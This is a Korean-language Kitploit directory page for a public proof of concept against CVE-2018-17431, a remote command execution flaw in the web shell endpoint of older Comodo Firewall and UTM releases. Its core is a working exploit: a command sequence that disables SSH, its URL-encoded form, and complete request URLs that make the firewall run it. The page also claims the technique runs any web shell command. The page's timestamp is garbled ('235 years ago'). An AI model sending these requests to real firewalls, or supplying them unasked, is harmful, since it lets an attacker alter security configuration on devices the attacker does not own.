Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-17431-PoC — CVE-2018-17431에 대한 개념 증명 | Kitploit
도구/GitHubGitHub/fadavvi/cve-2018-17431-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolArchived
GitHubfadavvi/cve-2018-17431-poc

CVE-2018-17431-PoC

CVE-2018-17431에 대한 개념 증명

저장소 보기
235년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2018-17431-PoC

CVE-2018-17431에 대한 개념 증명

익스플로잇 제목: Comodo Firewall 및 Central Manager (UTM) 2.7.0 및 1.5.0 이전 모든 릴리스에서 원격 명령 실행 (웹 셸 기반)

익스플로잇 작성자: Milad Fadavvi

공급업체 홈페이지: https://www.comodo.com/

소프트웨어 링크: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

버전: 2.7.0 및 1.5.0 이전

테스트 환경: Windows:firefox/chrome - Kali:firefox

발견일: 2018-08-15 (당일 보고됨)

버그 존재 확인: 2018-09-22 (Ticket ID: XWR-503-79437)

패치 릴리스: 2018-11-23 Comodo의 릴리스 노트

익스플로잇:

  1. WebShell 시뮬레이션:

    root@kitploit:~
     For example disable SSH in web shell is like this:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. 인코딩

    root@kitploit:~
     make above sequense encode with URL ECODING
     (I used burp encoder plugin)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. 실행

    root@kitploit:~
     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (extra enter key for run the command)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

"Configuration has been altered" 메시지가 포함된 페이지가 표시되며 구성이 변경됩니다!

이 기법을 사용하여 모든 WebShell 명령을 시뮬레이션할 수 있습니다.

도구 다운로드